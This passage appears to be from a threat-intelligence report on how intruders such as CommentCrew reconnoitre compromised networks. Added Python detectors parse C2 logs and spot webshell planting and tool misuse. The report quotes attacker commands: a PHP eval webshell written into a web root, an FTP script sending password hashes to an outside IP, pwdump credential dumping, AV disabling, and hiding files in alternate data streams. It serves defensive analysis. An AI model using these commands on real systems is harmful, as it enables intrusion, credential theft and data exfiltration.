|---|---|---|---|---|---|
| Identify key environment information | N/A | Partially dependent | Partially dependent | Partially dependent | N/A |
| Download of additional tools to collect environment information | N/A | N/A | Partially dependent | N/A | N/A |
| Elevate privileges to collect environment information | N/A | Partially dependent | N/A | N/A | N/A |
| Lateral movement | Partially dependent | Partially dependent | Partially dependent | N/A | N/A |
| Stage environment information for exfiltration | Dependent | Dependent | Partially dependent | Partially dependent | N/A |


4 NETWORK RECONNAISSANCE CASE STUDIES

4.1 CASE STUDY 1: ATTACK GROUP – COMMENTCREW

The attack group commonly known as ‘CommentCrew’ [4] is infamous for using a covert communications technique in which they embed commands in legitimate webpages inside comment tags. In a variation of this method, our team identified them using images to send commands to victims. Machines running the group’s malware would poll a compromised legitimate website in order to download a specific image and parse out the hidden commands that had been appended to the end of the file.

In early 2012 the BAE Systems Threat Intelligence team came across a series of websites where the attackers were using this particular technique. We monitored and deciphered the commands and were able to read them in plain text. The instructions issued to the malware revealed dozens of high-profile organisations. Over the following eight months we collected over ten thousand commands and gained a first-hand view of the internal network reconnaissance techniques used by this group. We monitored the channels by retrieving the pages periodically, and as a result some of the logs are incomplete.

The following sections show some example commands issued by the attacker to victim machines.

4.1.1 IDENTIFYING USER ACCOUNT INFORMATION

In order to move laterally, or to escalate privileges, the attackers are often seen attempting to gain details of user accounts on the network. It is important to note the syntax used in the commands displayed in the figures in Section 4: first a timestamp is given, then the number of the command in the session, followed by a unique identifier for the particular session opened.

Figure 3: An excerpt from C2 logs


In this instance net.exe is used to inspect user accounts on the domain. Attackers try to identify users who have been active on the machine, their security group, and information such as whether password resets are compulsory for that account, in order to decide which accounts’ credentials to target. In this instance the attacker quickly began to look beyond the initial workstation, running the net group command to find the names of the domain controllers on the network. This is because domain controllers are the core of the network: accounts and permissions across the estate are governed by these servers.
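As an added example (not code from the report), the following Python script parses C2 log lines in the layout described above, with the command text as a fourth field, groups them into sessions, reports command numbers that were never captured (a consequence of the periodic polling noted in Section 4.1) and tags each command with the reconnaissance objective from Section 3 that it serves. The tab-separated layout, the session identifiers, the user name and every sample line are constructed; the ‘!’ prefix on commands is taken from the report’s own excerpts and is assumed to be a C2 marker that the parser strips.

```python
"""Reconstruct attacker sessions from the C2 command log format described in
Section 4.1.1 (timestamp, command number within the session, session id, then
the command) and flag command numbers missed by periodic polling.

Added example; not code from the PIANOS report.  The tab separator, session ids
and all sample lines are constructed; the '!' prefix is taken from the report's
excerpts and stripped before classification (assumed to be a C2 marker).
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log.  Session b2c9 starts at command 12 and lacks command 13,
# as happens when the C2 page is only retrieved periodically.
SAMPLE_C2_LOG = """\
2012-03-05 09:14:02\t1\t7f3a\t!ipconfig /all
2012-03-05 09:14:40\t2\t7f3a\t!net user /domain
2012-03-05 09:15:12\t3\t7f3a\t!net group "Domain Controllers" /domain
2012-03-05 09:16:01\t4\t7f3a\t!net user jsmith /domain | find "Password expires"
2012-03-06 11:02:10\t12\tb2c9\t!tasklist
2012-03-06 11:03:55\t14\tb2c9\t!sc qc "Symantec AntiVirus"
2012-03-06 11:05:30\t15\tb2c9\t!net stop "Symantec AntiVirus"
2012-03-06 11:07:00\t16\tb2c9\t!tasklist | find "EXMRead"
"""

# Objective tags drawn from Sections 3 and 4.1; patterns are case-insensitive.
RULES = [
    ("identify_users", re.compile(r"^(net\s+(user|group|localgroup)|psloggedon|whoami)\b", re.I)),
    ("identify_processes", re.compile(r"^(tasklist|pslist|sc\s+(qc|query)|net\s+start)\b", re.I)),
    ("password_expiry_check", re.compile(r"password expires", re.I)),          # 4.1.6
    ("defence_tampering", re.compile(r"^(net\s+stop|pskill|taskkill)\b.*(symantec|antivirus|rtvscan)", re.I)),  # 4.1.5
]


def classify(cmd):
    """Return the list of objective tags whose pattern matches the command."""
    return [name for name, rx in RULES if rx.search(cmd)]


def parse_c2_log(text):
    """Return {session_id: [entries sorted by command number]}."""
    sessions = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, num, sid, cmd = line.split("\t", 3)
        cmd = cmd[1:] if cmd.startswith("!") else cmd   # strip assumed C2 prefix
        sessions[sid].append({"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                              "num": int(num), "cmd": cmd, "tags": classify(cmd)})
    for entries in sessions.values():
        entries.sort(key=lambda e: e["num"])
    return sessions


def summarise(sessions):
    """One summary per session: time span, commands captured, command numbers
    never captured, and the objectives seen, in order of first appearance."""
    out = []
    for sid, entries in sessions.items():
        nums = [e["num"] for e in entries]
        seen = set(nums)
        missing = [n for n in range(1, max(nums) + 1) if n not in seen]
        objectives = []
        for e in entries:
            for t in e["tags"]:
                if t not in objectives:
                    objectives.append(t)
        out.append({"session": sid, "start": entries[0]["ts"], "end": entries[-1]["ts"],
                    "captured": len(entries), "missing": missing, "objectives": objectives})
    return out


if __name__ == "__main__":
    for s in summarise(parse_c2_log(SAMPLE_C2_LOG)):
        print(f"session {s['session']}: {s['captured']} commands captured "
              f"{s['start']:%Y-%m-%d %H:%M:%S} to {s['end']:%H:%M:%S}, "
              f"missing numbers {s['missing']}, objectives {s['objectives']}")
```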

4.1.2 DOWNLOAD OF LEGITIMATE TOOLS FOR USE IN THE ATTACK

In order to blend in with normal users the attackers are often seen using legitimate applications to carry out tasks. By using legitimate tools rather than building the capability into the malware they are able to keep the malware lightweight. This means it is less likely to be detected using host-based heuristics.

Figure 4: Commands showing the attacker activating the session, navigating to a previously created directory and downloading several tools to help with internal network reconnaissance

In this case we can view the first few commands in a given session to an infected machine in lines 2036-2039. These commands break the syntax of the Windows command line and would not make sense to run normally; however, they are parameters sent to the malware, which knows to interpret them differently: it parses each command and treats the URL as an instruction to download the resource and save it to the given file path.

Additionally these commands give an idea of the tools that attackers have identified as necessary for their internal reconnaissance. Both ‘pslist’ and ‘pskill’ are legitimate copies of Microsoft SysInternals tools, which the attacker saves locally as ‘psl.exe’ and ‘psk.exe’, presumably due to personal preference. ‘Pslist’ allows you to view detailed information about processes on the machine, and ‘pskill’ terminates processes by name or process ID. In combination, these tools are useful to attackers as they allow them to identify running processes and kill them, for example to disable security products.

4.1.3 RECONNAISSANCE FOR TARGETED INFORMATION

We observed the attacker performing directory listings of all drives on the local machine, saving them to a file and uploading the file to a remote server. This allows them to identify files of interest and search the file listings for key directories or project names related to their objectives. Filenames can reveal where commercial relationships exist; for example, we have sometimes observed the attackers searching for Non-Disclosure Agreement (NDA) documents, the presence of which would indicate a commercial relationship between two organisations.

Often when attackers begin their search of the infected asset they will perform directory listings on all of the drives available. It is believed that the review of information retrieved may be carried out by a different component of the group than the operator. The file listing is saved to a .dat file which is later uploaded to a server compromised by the attacker.


In this case we also see the attacker specifying the search conditions to include anything with the term ‘keesee’ in it. KEESEE is a type of encryption often used to protect sensitive and classified material [5]. It is likely that in this case the attackers’ mission was to uncover information about this particular encryption algorithm.

Figure 5: Example commands of the attacker running file listings on a victim machine

Figure 6: Commands showing the attacker looking for information on the process running as ‘NiAiServ.exe’

Figure 7: Commands showing the attacker retrieving the file and uploading it to a remote server

4.1.4 USE OF EXISTING SOFTWARE OR APPLICATIONS TO ACHIEVE PERSISTENCE

We have observed many instances of CommentCrew abusing existing software and services in order to achieve persistence, and as a means to navigate the network.

The following set of commands takes place mid-way through an active session. It shows the attacker searching through running services, identifying entries which could be manipulated and later modifying them to run malicious code.

The attacker first lists the running services, before performing basic operations on a particular service and then looking for more detailed information about the process running the file “NiAiServ.exe”. This executable forms part of the product NetInstall [6], produced by Enteo, which is used for asset management.


Figure 8: Commands showing the attacker nullifying an element of Symantec AV

In Figure 7 we can see the attacker:

• viewing the NetInstall directory:

dir "C:\Program Files\NetInst"

• viewing the contents of the configuration file within the same directory:

type "C:\Program Files\NetInst\Lc1Fi12k.cfg"

• copying the executable associated with the NetInstall process:

copy "C:\Program Files\NetInst\NiAiServ.exe"

The file is then uploaded to a remote server using a custom tool, ‘htpf.exe’, which sends files using an HTTP PUT. It is likely that this is done with the aim of subverting the process (i.e. adding malicious code to it, or altering it) either later in the same attack or in future attacks.

4.1.5 STOPPING AV

We observed the attackers manually nullifying existing defences on the machine. It is common for popular malware families such as ZeuS to attempt to prevent AV services from updating, or to attempt to disable them entirely, in order to prevent future detection. In the case of espionage malware, such measures are not undertaken automatically and are instead carried out manually by the attacker. This is because, as mentioned previously, many attackers do not build in automated functionality, so that their malware is lightweight and hard to detect.

First the attacker lists the tasks running on the machine using the inbuilt Windows command ‘tasklist’. Viewing the results, the attacker was able to identify the process associated with the AV running on the machine. We believe the attacker must have listed all running services in command 14 (which is missing from our logs), because in the next command the attacker runs ‘sc qc’, which displays the configuration of a service, including the binary responsible for the service and its location.

They also identify another key process linked to the Symantec AV and focus their attention on ‘Rtvscan.exe’, which is responsible for the real-time scanning component of the product. To prevent the process from running, the attackers first rename the executable to ‘sed.exe’. Directly afterwards they are observed stopping the “Symantec Antivirus” service. By renaming the executable associated with the AV, the attacker ensures that when the service next attempts to start it will be unable to find the correct file.

Disabling AV measures on the asset gives the attacker more freedom to download tools which may be picked up by conventional AV vendors, and reduces the chances of the attack being detected in the future.


4.1.6 THEFT OF E-MAIL DATA

In the sequence of commands in Figure 9 we can see the attacker download and use a tool with the filename ‘EXMRead.exe’.

The tool is downloaded from a compromised webserver and saved in the System32 directory. EXMRead.exe is a command line tool designed for reading e-mails (Exchange mail reader), and after identifying a mail server the tool is used. Commands 11 and 12 are missing from our logs, but it is believed the process is started in one of these commands, as in command 13 we can see the attacker checking whether the process is running using the command !tasklist | find "EXMRead".

Having checked the process is operational, the attacker uses the tool with a series of parameters that includes the user’s IP, associated domain, username and password along with another set of parameters that include organisation and recipient. The credentials used in these commands were stolen on a previous day of the attack.

After looking at the e-mails received by the targeted users, the attackers check the date on which the password for the users will expire, using the command:

!net user {username} /domain | find "Password expires"

This way the attacker knows when the password is likely to change, and therefore how long they have access to the account before they will need to dump and crack the passwords again. This activity shows evidence of planning ahead for later in the attack.

4.1.7 COLLECTING PASSWORDS

One of the key reconnaissance actions outlined in Section 3 was the collection of additional credentials for use in both the current and future attacks. In the following sequence of commands we can see the attacker download a password dumping utility and use it to retrieve credentials:

Figure 9: This set of commands shows the attacker download and then use a tool for dumping e-mails from an Exchange server

Figure 10: This command shows the attackers attempting to use a password dumping tool


Figure 11: Creation of an FTP script to exfiltrate password hashes

The attacker is observed downloading the tool ‘PW62.exe’ from a compromised site and placing it in the Help directory; this is the tool ‘pwdump6’ [7]. After confirming the tool has downloaded successfully the attacker runs it, passing the network share ‘HQINFO1’ as a parameter, and saves the results to the text file ‘hash.txt’. Later the attacker can be seen using credentials, presumably cracked from the hashes in the output file, to log into another share, ‘\\HQINFO2’.

The name of the compromised account indicates it is likely to be an administrator account, and as such compromising it will be valuable to the attacker, allowing them to move across the network with little trouble.

Later in the same session we observed the attackers writing the results of the password hash dump to a file and exfiltrating it to a remote server:

The attackers make use of the ‘echo’ command to build a batch file. Whilst we do not possess all of the commands, we are able to make out the following information being written into the batch script:

ftp 64.15.150.90

[REDACTED]

put a.bin

They then run the FTP script using the inbuilt Windows ‘ftp’ command, passing ‘-s:up.txt’ as a parameter, which tells ftp to take its commands from that script file.

4.2 CASE STUDY 2: RECONNAISSANCE ON A COMPROMISED WEB SERVER

In August 2013 BAE Systems engaged with a client on a piece of incident response work to investigate a multi-pronged attack. The attackers used the watering hole technique [8] to infiltrate endpoints and simultaneously attacked the webservers of the target organisation. The attackers probed the organisation’s external-facing IP addresses for particular URLs, checking whether they existed, in order to identify vulnerable services running on the webservers. They successfully identified that a webserver was running a poorly configured instance of Tomcat which allowed them to issue commands to the server in the URL, by making HTTP requests to the endpoint in the following format:

http://$destinationIP/console/jsp-info.jsp?cmd=[Command]

An overview of the commands run during the session is shown in the timelines below; it reveals the order in which operations take place once attackers have gained access. All timestamps associated with the commands displayed are in GMT.


4.2.1 INITIAL RECONNAISSANCE

The set of commands shown in Figure 12 shows the activity of the attacker after they first realise that they are able to issue commands. The attacker goes through a number of commands which enable them to understand where they are on the network:

Figure 12: A timeline of initial commands issued by the attacker once they have gained access

Table 7: Descriptions and rationale for commands issued in Figure 12

ipconfig /all
  What it does: Displays the full TCP/IP configuration for all adapters.
  Why that’s useful for the attacker: This gives the attacker key information about the way the victim machine interacts with the network, the way the network is configured and the IP addresses of key infrastructure machines.

net view
  What it does: This command uses the legitimate tool ‘net.exe’ located in C:\Windows\System32. When used with the ‘view’ parameter the command returns a list of connected devices.
  Why that’s useful for the attacker: The attacker uses this list of devices to find more information about those devices in subsequent commands.

ping www.google.com
  What it does: The command ‘ping’ is used to verify that a device can communicate with the host named after the command.
  Why that’s useful for the attacker: The attacker uses this to check if the web server is able to make outbound web requests.

net start
  What it does: This command uses the legitimate tool ‘net.exe’ located in C:\Windows\System32. Using the ‘start’ parameter gives a list of services currently running.
  Why that’s useful for the attacker: By listing the running services the attacker can identify information such as the AV in use, services that may be manipulated, or services that may contain valuable data (such as SQL services).

netstat -an
  What it does: This command uses the legitimate tool ‘netstat.exe’ located in C:\Windows\System32. The utility shows all TCP connections on the Windows system, listing all listening ports.
  Why that’s useful for the attacker: This information can be used to identify key IP addresses in the network infrastructure, as well as the ports open on connected devices.

dir
  What it does: When a directory is supplied as the argument, or no argument is supplied, this lists the files in the directory along with basic information about each file. If a file is supplied as the argument this command returns basic information about that file.
  Why that’s useful for the attacker: This information can be used by attackers to identify files of interest.

(Continued)


Table 7 (continued)

whoami
  What it does: This command returns the domain on which the current user is logged on, along with the current username.
  Why that’s useful for the attacker: This can be used to understand which credentials the attacker’s commands are currently being issued with, and therefore their current privileges.

set
  What it does: This displays the current environment variables that have been set. This includes information such as the operating system of the machine, the home drive, the logon server, as well as the domain used for DNS requests.
  Why that’s useful for the attacker: This information can be used to inform the attackers’ approach to reconnaissance; for example, they may want to dump password hashes from the logon server.

net user
  What it does: This command uses the legitimate tool ‘net.exe’ located in C:\Windows\System32. With the ‘user’ parameter, this displays a list of all users that have accounts on the local device.
  Why that’s useful for the attacker: The users presented to the attacker might be used as a means of selecting where they wish to move laterally, especially if users with administrative privileges are named in a conspicuous way.

This period of activity takes about 10 minutes, with commands issued on an infrequent basis as the attackers take time to read and store the responses.

Using the information gathered from these commands the attackers can begin to plan their next steps.

4.2.2 TESTING CURRENT ABILITY

After the attacker has reviewed the initial output from the previous commands, we observed the attacker perform basic tests to assess their current capability:

Figure 13: A timeline of subsequent commands issued by the attacker


Table 8: Description and motivations for commands issued in Figure 13

net user administrator
  What it does: This command uses the legitimate tool ‘net.exe’ located in C:\Windows\System32 and displays information about the user specified.
  Why that’s useful for the attacker: The information returned by this command includes fields which are useful to an attacker, including ‘Workstations allowed’ (whether a user is restricted to a particular machine), ‘Password expires’ (if/when the user’s password will expire) and ‘Account active’ (whether the account can currently be used). All of these help the attacker identify which accounts are worth compromising.

hostname
  What it does: Gives the machine name of the device currently in use.
  Why that’s useful for the attacker: This allows the attacker to recognise the current machine when it is referenced by commands such as net view. The name of a device can also give away its purpose, for example “MAILSERVER01”.

net user > C:/ms4w/Apache/htdocs/1.txt
  What it does: This command uses the legitimate tool ‘net.exe’ located in C:\Windows\System32 with the ‘user’ parameter, saving the results into a file. It displays all of the users who have accounts on the local device.
  Why that’s useful for the attacker: From the list of local accounts the attacker can often identify privileged users based on their usernames, for example ‘abc_admin’. These users can then be targeted during password dumping later in the attack.

type <filename>
  What it does: Outputs the content of the file supplied as a parameter to the console.
  Why that’s useful for the attacker: This allows the attacker to see the results of commands issued.

telnet 133.242.{REDACTED} 53
  What it does: This command uses the Telnet protocol to connect to the remote IP 133.242.{REDACTED} on port 53.
  Why that’s useful for the attacker: The attacker checks if they are able to Telnet out; if so, this would provide a method of communication which is unlikely to be logged. In this incident they were unable to use this protocol.

tftp 133.242.{REDACTED} get 1.txt
  What it does: This command uses TFTP, a file transfer protocol; the attacker attempts to use it to transfer the file ‘1.txt’.
  Why that’s useful for the attacker: The attacker checks if they are able to use TFTP to transfer files; if successful they could use the protocol to download malware onto the webserver. In this incident they were unable to use this protocol.

tasklist
  What it does: Shows a list of processes currently running, along with basic information about each process.
  Why that’s useful for the attacker: This enables the attacker to understand the services running on the server that they may be able to abuse; on a webserver, for example, they may look for the versions of SQL or Apache in use.

mysql -h
  What it does: Connects to the MySQL database. The -h option specifies the host.

calc
  What it does: Runs the Windows calculator. The attacker is checking if they are able to run an executable.

taskkill /im calc.exe
  What it does: This kills the task with the image name ‘calc.exe’.
  Why that’s useful for the attacker: The attackers terminate the calc process in order to check they are able to kill processes.

net user domain
  What it does: In this case the attackers are using the ‘net user’ command; the parameter ‘domain’ is a username on the server. This displays detailed information about that user.
  Why that’s useful for the attacker: This shows key information about accounts that attackers can use to inform their choices in terms of password dumping. Details such as whether the password must be changed, as well as the last logon time, indicate how likely cracked passwords are to be effective.


There is a noticeable shift in the commands, from finding out basic information on the environment, to testing capability.

The attacker also tests connectivity, seeing if protocols such as telnet are allowed, over a variety of ports (although only 53 is shown in the graphic, they also tried to connect over telnet on port 80). They tried these ports as they are likely to be configured to allow both inbound and outbound traffic on firewalls as they are necessary for regular browsing.

At 06:54:53 the attacker tests what they can and cannot do, first starting the process ‘calc’, which runs the inbuilt Windows calculator, only to kill it a minute later, proving that they are able to start and stop processes at will. The attacker also uses the command ‘net user’ on a number of accounts. This allows them to view key information about the victims which can be used when they are looking to compromise credentials and elevate their privileges. Extensive use of ‘net’ commands is commonplace during internal network reconnaissance; this is because they are legitimate Windows tools and are:

• difficult to restrict the use of as they are often used benignly,

• hard to log the use of,

• frequently used by system admins.

4.2.3 ADDITIONAL COMMANDS

After this the attacker checks the version of PHP running on the server, so that later they are able to construct the ‘mapper.php’ script correctly. The attacker then realises they can easily add code to the webserver, which will enable them to mask commands rather than send them in plain text.

Figure 14: Additional commands run by the attacker on the webserver

Table 9: Description of the commands issued in Figure 14

php -v
  What it does: This command shows the version of PHP currently running on the server.
  Why that’s useful for the attacker: The attacker is able to write a PHP file later which is compatible with the version of PHP running on the server.

dir C:/Ms4w/Apache/htdoc
  What it does: Lists the contents of the directory supplied as the argument.
  Why that’s useful for the attacker: The attacker is able to see the files available in the directory.

type C:/ms4w/Apache/htdocs/log.php
  What it does: Echoes the content of the file supplied as a parameter to the console.
  Why that’s useful for the attacker: This displays the content of the log file to the attacker, at which point they probably realise

/c echo ^<?php eval^{$_POST[z])?^><C:\ms4w\Apache\htdocs\mapper.php
  What it does: Echoes the string "^<?php eval^{$_POST[z])?^>" into the file "C:\ms4w\Apache\htdocs\mapper.php".
  Why that’s useful for the attacker: This command creates a new file, ‘mapper.php’. The script created allows the attacker to issue commands to the server without putting them in the URL field, meaning future commands are not logged.

mapper.php
  What it does: The attacker is now using the script created in the command above.
  Why that’s useful for the attacker: Commands sent by the attacker are no longer logged.

Page 29: PIANOS: Protecting Information About Networks The Organisation and It's Systems

27 BAE Systems Applied Intelligence

All of the commands in this section are issued within Windows Powershell. The command issued at 07:40:19 shows the attacker creating a file ‘mapper.php’ in the htdocs folder. Files in this folder are typically visible to anyone visiting the webserver from an external IP. In this case we can see the contents of mapper.php are quite simple:

“?php eval^($_POST[z])?”

This simple script allows the attacker to make HTTP POSTs to the server instead of GET requests, where the command is displayed in the URL. At this point our ability to follow the actions of the attacker was removed, as they simply continued the session with repeated HTTP POSTs to the server, the contents of which were not logged.
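As an added example (not from the report or from the incident logs), the following Python script applies the two indicators described above to constructed Apache access log lines: a GET whose injected command writes a .php file containing eval and a request superglobal, and any later POST to that planted file. The log.php and mapper.php names follow the case study; the log lines, client addresses and timestamps are constructed.

```python
import re
from urllib.parse import unquote

# Apache Common/Combined Log Format prefix: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Fragments that mark PHP code being written rather than an ordinary parameter value
WEBSHELL_MARKERS = ("<?php", "eval(", "$_post[", "$_get[", "$_request[")

# Constructed sample modelled on the case study (log.php taking a cmd= parameter,
# then mapper.php being created with echo and driven via POST). Not real log data.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Mar/2013:07:39:50 +0000] "GET /log.php?cmd=php%20-v HTTP/1.1" 200 512',
    '203.0.113.5 - - [12/Mar/2013:07:40:19 +0000] "GET /log.php?cmd=/c%20echo%20%5E%3C%3Fphp'
    '%20eval%5E(%24_POST%5Bz%5D)%3F%5E%3E%20%3E%20C:%5Cms4w%5CApache%5Chtdocs%5Cmapper.php'
    ' HTTP/1.1" 200 12',
    '203.0.113.5 - - [12/Mar/2013:07:41:02 +0000] "POST /mapper.php HTTP/1.1" 200 88',
    '198.51.100.7 - - [12/Mar/2013:07:42:10 +0000] "GET /index.php HTTP/1.1" 200 2048',
]


def parse_line(line):
    """Split one access-log line into fields; the query string is URL-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["target"].partition("?")
    rec["path"] = path
    rec["query"] = unquote(query)
    return rec


def written_php_file(query):
    """If the decoded query redirects command output into a .php file, return its basename."""
    q = query.replace("^", "")  # cmd.exe caret escapes hide '<', '(' and '>' from the shell
    m = re.search(r'>\s*([^\s&]+\.php)', q, re.IGNORECASE)
    if not m:
        return None
    return re.split(r'[\\/]', m.group(1))[-1].lower()


def looks_like_webshell(query):
    q = query.replace("^", "").lower()
    return any(marker in q for marker in WEBSHELL_MARKERS)


def analyse(lines):
    """Return (reason, client ip, object) findings for the webshell-planting pattern."""
    findings = []
    planted = set()        # basenames of PHP files written by injected commands
    served_by_get = set()  # paths that have been fetched normally
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "GET":
            served_by_get.add(rec["path"].lower())
            target = written_php_file(rec["query"])
            if target and looks_like_webshell(rec["query"]):
                planted.add(target)
                findings.append(("PHP file written by injected command", rec["ip"], target))
        elif rec["method"] == "POST":
            path = rec["path"].lower()
            if path.rsplit("/", 1)[-1] in planted:
                findings.append(("POST to planted PHP file", rec["ip"], rec["path"]))
            elif path.endswith(".php") and path not in served_by_get:
                findings.append(("POST to PHP file never served via GET", rec["ip"], rec["path"]))
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(*finding)
```

The second rule is deliberately weaker than the first: a POST to a script that no client ever fetched is only a lead, whereas a POST to a file that an earlier injected command wrote is the pattern seen in the case study.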

4.3 CASE STUDY 3: TOOLS USED DURING INTRUSIONS

Across the incident responses and threat intelligence work undertaken by BAE Systems we have identified a number of tools used by attackers which are used to achieve their goals, including network reconnaissance tools. The list includes legitimate tools used by attackers as well as attacker tools, all of which are used to achieve objectives after malware has been deployed.

Table 10: A table summarising utilities and tools commonly used by attackers during network intrusions

NTLMHash.exe
Description: This tool was downloaded during logs acquired as part of the analysis conducted in section 3.2. The tool output NTLM hashes of passwords stored which the attacker later cracked in order to access additional accounts on the victim network.
Why it’s used: This was used to dump passwords of higher privileged users, so that these accounts could be used for lateral movement.

pslist
Description: This tool was downloaded during logs acquired as part of the analysis conducted in section 3.2. This tool was a legitimate copy of the SysInternals tool ‘pslist’ which returns a list of processes currently running along with more detailed information than is available by simply using ‘tasklist’.
Why it’s used: This was observed in multiple intrusions by CommentCrew and generally the SysInternals suite seemed to be the attackers’ preferred toolset for reconnaissance. By seeing what processes are running attackers can identify:
– Security applications running (such as AV, other host based detection systems)
– Services running that can be abused (DLL hijacking, binary planting)
– Investigative tools running (such as Wireshark etc.)

psloggedon
Description: This tool was downloaded during logs acquired as part of the analysis conducted in section 3.2. This tool was a legitimate copy of the SysInternals tool psloggedon.
Why it’s used: This was observed in multiple intrusions by CommentCrew and generally the SysInternals suite seemed to be the attackers’ preferred toolset for reconnaissance. This command can be used to identify the relationship between a device and a user. In the instances we’ve observed this used, it’s typically been to ensure that the attacker does not log onto a machine at the same time as a user who is already logged on, so as to avoid detection.

pwdump6
Description: This tool was downloaded during logs acquired as part of the analysis conducted in section 3.2. The tool is a publicly available password dumping utility which can be found online [7].
Why it’s used: This tool was used for dumping of password hashes.

WINRAR or custom versions thereof
Description: This tool was downloaded during logs acquired as part of the analysis conducted in section 3.2. The attacker downloaded a custom version of WinRAR which ran on the command line only.
Why it’s used: The tool was used to create archives of files, before they were exfiltrated. It is unclear why they used a custom version of WinRAR to do this rather than the full version of the tool which offers the same capability. We have also observed the same attackers using a regular copy of the same software.

MSN Messenger client part
Description: This tool was downloaded during logs acquired as part of the analysis conducted in section 3.2. In one session between the attacker and a victim, the attacker was observed downloading a DLL utilised by the legitimate tool MSN Messenger. In MSN Messenger, the DLL was used for sending and receiving files, and the attackers used it for the same capability.
Why it’s used: By exfiltrating data using MSN Messenger, the attackers would be able to blend in to the noise of other network traffic.

Teamviewer
Description: Teamviewer [9] provides legitimate software for remote desktop capability.
Why it’s used: The software can also be abused by attackers and where an organisation has legitimate uses for Teamviewer, misuse of the application can be difficult to spot. Also, as the software is an off the shelf product it is easy for attackers to use, and offers a large range of functionality.

Csvde.exe
Description: This is a legitimate tool which is located on Windows servers in the System32 folder. This is a command line application designed to batch imports and exports into Active Directory, for example creating multiple user accounts in a single command.
Why it’s used: Active Directory data contains valuable information such as lists of users, user groups/permissions, computers, servers, network shares and many other data fields. This is essentially a map of the estate and often leads to attackers targeting specific machines once this information has been exfiltrated. Often machine hostname entries have their associated owner listed in the description field in Active Directory; this can help an attacker target individuals.
Examples: Example for dumping Active Directory:
csvde.exe -f output.csv
During an incident response we investigated the attacker utilising both of these tools in conjunction: the attacker runs csvde.exe and compresses the output file using WinRAR into the file C:\Windows\System32\c.rar, which is assumed to have been exfiltrated.
The attacker then analysed this information to identify the hostname of a senior executive and subsequently accessed their machine using the Windows Task Scheduler shortly after. Once the attacker accessed the senior executive’s machine there was good evidence to suggest their emails were subsequently downloaded and exfiltrated.

type.exe
Description: This is a standard Windows executable and when run it prints the contents of a file to the console.
Why it’s used: It can also be used to hide files in alternate data streams, e.g. type bad.exe > c:\Windows\System32\notepad.exe:bad.exe, or can be used when copy is blocked, or to insert the results of a command into a file.
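The following Python detector is an added example, not tooling from the report: it applies Table 10’s tool list and command-line shapes (the csvde -f export, the type … > file:stream redirect into an alternate data stream, a command-line archiver’s ‘a’ verb writing a .rar, and the ‘net user’ commands from the case study) to constructed process-creation records and returns the reasons each event merits attention. Hostnames, users and paths in the sample are constructed.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    user: str
    image: str      # full path of the executable that started
    cmdline: str    # its command line


# Tools named in Table 10, keyed by lowercase executable name
KNOWN_TOOLS = {
    "ntlmhash.exe": "credential dumping (NTLMHash)",
    "pwdump6.exe": "credential dumping (pwdump6)",
    "pslist.exe": "process enumeration (SysInternals pslist)",
    "psloggedon.exe": "logged-on user enumeration (SysInternals psloggedon)",
    "csvde.exe": "Active Directory export tool",
}
# csvde -f <file> writes the directory out to a file (-i would be an import)
CSVDE_EXPORT = re.compile(r'(^|\s)[-/]f\s+\S+', re.IGNORECASE)
# rar-style "a" (add) verb followed by an archive name, whatever the binary is called
RAR_ADD = re.compile(r'(^|\s)a\s+(?:-\S+\s+)*\S+\.rar\b', re.IGNORECASE)
# net user / net group / net view: built-in commands used for reconnaissance
NET_RECON = re.compile(r'\bnet(?:\.exe)?\s+(user|group|localgroup|view)\b', re.IGNORECASE)


def basename(path):
    return re.split(r'[\\/]', path)[-1].lower()


def ads_target(cmdline):
    """Return the file:stream target if 'type X > Y:stream' writes into an alternate data stream."""
    m = re.search(r'\btype\s+\S+\s*>\s*(\S+)', cmdline, re.IGNORECASE)
    if not m:
        return None
    target = m.group(1)
    body = re.sub(r'^[A-Za-z]:', '', target)  # ignore the drive-letter colon
    return target if ':' in body else None


def evaluate(ev):
    """Return the reasons (possibly none) why this process event merits attention."""
    reasons = []
    name = basename(ev.image)
    if name in KNOWN_TOOLS:
        reasons.append(KNOWN_TOOLS[name])
    if name == "csvde.exe" and CSVDE_EXPORT.search(ev.cmdline):
        reasons.append("directory exported to file (estate map usable for lateral movement)")
    target = ads_target(ev.cmdline)
    if target:
        reasons.append(f"file hidden in alternate data stream {target}")
    if RAR_ADD.search(ev.cmdline):
        reasons.append("command-line archive created (staging for exfiltration)")
        if "system32" in ev.cmdline.lower():
            reasons.append("archive written under System32")
    if NET_RECON.search(ev.cmdline):
        reasons.append("account/group enumeration with net command")
    return reasons


def triage(events):
    """Return (host, user, executable, reasons) for every event with at least one reason."""
    results = []
    for ev in events:
        reasons = evaluate(ev)
        if reasons:
            results.append((ev.host, ev.user, basename(ev.image), reasons))
    return results


# Constructed sample events (not real telemetry) echoing the tool use described on this page
SAMPLE_EVENTS = [
    ProcessEvent("WS-042", "CORP\\jsmith", r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c type bad.exe > c:\Windows\System32\notepad.exe:bad.exe"),
    ProcessEvent("DC-01", "CORP\\svc_backup", r"C:\Windows\System32\csvde.exe",
                 "csvde.exe -f output.csv"),
    ProcessEvent("DC-01", "CORP\\svc_backup", r"C:\Temp\r.exe",
                 r"r.exe a -r C:\Windows\System32\c.rar output.csv"),
    ProcessEvent("WS-042", "CORP\\jsmith", r"C:\Windows\System32\net.exe",
                 "net user administrator /domain"),
    ProcessEvent("WS-017", "CORP\\mlee", r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                 "WINWORD.EXE report.docx"),
]

if __name__ == "__main__":
    for host, user, exe, reasons in triage(SAMPLE_EVENTS):
        print(host, user, exe, "; ".join(reasons))
```

Matching on command-line shape rather than only on file name is what catches the renamed archiver and the cmd.exe built-ins, which is where a plain software inventory check falls short.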


5 CONTROLS, TACTICS AND TECHNIQUES

